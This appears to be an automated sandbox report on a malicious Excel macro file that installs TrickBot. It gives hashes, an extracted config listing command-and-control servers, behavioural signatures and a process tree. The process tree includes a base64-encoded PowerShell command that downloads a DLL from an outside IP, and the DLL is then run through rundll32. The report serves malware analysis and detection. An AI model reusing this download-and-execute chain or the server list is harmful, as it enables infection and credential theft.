Analysis
-
max time kernel
129s -
max time network
139s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
14-10-2021 18:06
Static task
static1
Behavioral task
behavioral1
Sample
doc2_5.xlsm
Resource
win7-en-20210920
General
-
Target
doc2_5.xlsm
-
Size
130KB
-
MD5
bb9509e3a758f80aba854fbf3f1fb7be
-
SHA1
45389b76ed4ad5d41205b754775de4f9f3fd1076
-
SHA256
6cdc36e5c8774b62bbeeaa2141af5fd3c9c5ca33e0197e6301f76f23e59e9e22
-
SHA512
c11c2e545ca8d092c772a8d2bda01bb82be89b81f2ac3c0d2e478972b5606ed8405fc350d993434cd4023b4ff958dd83e470f89d3726a144de766ba5cbc550e7
Malware Config
Extracted
trickbot
100019
sof1
65.152.201.203:443
185.56.175.122:443
46.99.175.217:443
179.189.229.254:443
46.99.175.149:443
181.129.167.82:443
216.166.148.187:443
46.99.188.223:443
128.201.76.252:443
62.99.79.77:443
60.51.47.65:443
24.162.214.166:443
45.36.99.184:443
97.83.40.67:443
184.74.99.214:443
103.105.254.17:443
62.99.76.213:443
82.159.149.52:443
-
autorunName:pwgrabbName:pwgrabc
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3116 1500 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 30 832 powershell.exe -
Downloads MZ/PE file
-
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 1780 rundll32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1500 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 832 powershell.exe 832 powershell.exe 832 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exewermgr.exedescription pid process Token: SeDebugPrivilege 832 powershell.exe Token: SeDebugPrivilege 1140 wermgr.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
EXCEL.EXEcmd.exerundll32.exerundll32.exedescription pid process target process PID 1500 wrote to memory of 3116 1500 EXCEL.EXE cmd.exe PID 1500 wrote to memory of 3116 1500 EXCEL.EXE cmd.exe PID 3116 wrote to memory of 832 3116 cmd.exe powershell.exe PID 3116 wrote to memory of 832 3116 cmd.exe powershell.exe PID 3116 wrote to memory of 3936 3116 cmd.exe rundll32.exe PID 3116 wrote to memory of 3936 3116 cmd.exe rundll32.exe PID 3936 wrote to memory of 1780 3936 rundll32.exe rundll32.exe PID 3936 wrote to memory of 1780 3936 rundll32.exe rundll32.exe PID 3936 wrote to memory of 1780 3936 rundll32.exe rundll32.exe PID 1780 wrote to memory of 4020 1780 rundll32.exe cmd.exe PID 1780 wrote to memory of 4020 1780 rundll32.exe cmd.exe PID 1780 wrote to memory of 4020 1780 rundll32.exe cmd.exe PID 1780 wrote to memory of 1140 1780 rundll32.exe wermgr.exe PID 1780 wrote to memory of 1140 1780 rundll32.exe wermgr.exe PID 1780 wrote to memory of 1140 1780 rundll32.exe wermgr.exe PID 1780 wrote to memory of 1140 1780 rundll32.exe wermgr.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\doc2_5.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /B /MIN /WAIT powershell -enc IABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvADEAOQA1AC4AMQAzADMALgAxADkAMgAuADEAMAAxAC8AaQBtAGEAZwBlAHMALwByAGUAZABwAGwAYQBuAGUALgBwAG4AZwAiACAALQBPAHUAdABGAGkAbABlACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYgAuAGQAbABsACIA & start C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,gigi2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc IABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvADEAOQA1AC4AMQAzADMALgAxADkAMgAuADEAMAAxAC8AaQBtAGEAZwBlAHMALwByAGUAZABwAGwAYQBuAGUALgBwAG4AZwAiACAALQBPAHUAdABGAGkAbABlACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYgAuAGQAbABsACIA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:832 -
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,gigi3⤵
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,gigi4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe5⤵PID:4020
-
C:\Windows\system32\wermgr.exeC:\Windows\system32\wermgr.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1140
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\clb.dllMD5
af9139482aba39172f04ac800e5d590a
SHA1ddc8c326695321288e8b6188f85f09a2f3bfc3ba
SHA256c164942112155303e1834906023a1474b807c1be845021b30ab7ce0b8bc475a0
SHA512feb3fa1b54e1530305560df17229f20f6c750331e7db571ea0b9407ffd9dca31a02882eab9429529a4f94e3c4e0f873add9a3724a18ad0e14951708e28e5cbfe
-
\ProgramData\clb.dllMD5
af9139482aba39172f04ac800e5d590a
SHA1ddc8c326695321288e8b6188f85f09a2f3bfc3ba
SHA256c164942112155303e1834906023a1474b807c1be845021b30ab7ce0b8bc475a0
SHA512feb3fa1b54e1530305560df17229f20f6c750331e7db571ea0b9407ffd9dca31a02882eab9429529a4f94e3c4e0f873add9a3724a18ad0e14951708e28e5cbfe
-
memory/832-284-0x0000000000000000-mapping.dmp
-
memory/832-303-0x00000240CD566000-0x00000240CD568000-memory.dmpFilesize
8KB
-
memory/832-294-0x00000240CD560000-0x00000240CD562000-memory.dmpFilesize
8KB
-
memory/832-295-0x00000240CD563000-0x00000240CD565000-memory.dmpFilesize
8KB
-
memory/1140-325-0x000001B91EDE0000-0x000001B91EE09000-memory.dmpFilesize
164KB
-
memory/1140-326-0x000001B91EF10000-0x000001B91EF11000-memory.dmpFilesize
4KB
-
memory/1140-324-0x0000000000000000-mapping.dmp
-
memory/1500-120-0x0000022DCA530000-0x0000022DCA532000-memory.dmpFilesize
8KB
-
memory/1500-118-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmpFilesize
64KB
-
memory/1500-264-0x0000022DDE3C0000-0x0000022DDE3C4000-memory.dmpFilesize
16KB
-
memory/1500-122-0x0000022DCA530000-0x0000022DCA532000-memory.dmpFilesize
8KB
-
memory/1500-115-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmpFilesize
64KB
-
memory/1500-116-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmpFilesize
64KB
-
memory/1500-121-0x0000022DCA530000-0x0000022DCA532000-memory.dmpFilesize
8KB
-
memory/1500-117-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmpFilesize
64KB
-
memory/1500-119-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmpFilesize
64KB
-
memory/1780-308-0x0000000000000000-mapping.dmp
-
memory/1780-320-0x0000000000630000-0x00000000006BE000-memory.dmpFilesize
568KB
-
memory/1780-322-0x0000000000990000-0x0000000000991000-memory.dmpFilesize
4KB
-
memory/1780-323-0x0000000000731000-0x0000000000733000-memory.dmpFilesize
8KB
-
memory/1780-321-0x00000000041A0000-0x00000000041E5000-memory.dmpFilesize
276KB
-
memory/3116-282-0x0000000000000000-mapping.dmp
-
memory/3936-306-0x0000000000000000-mapping.dmp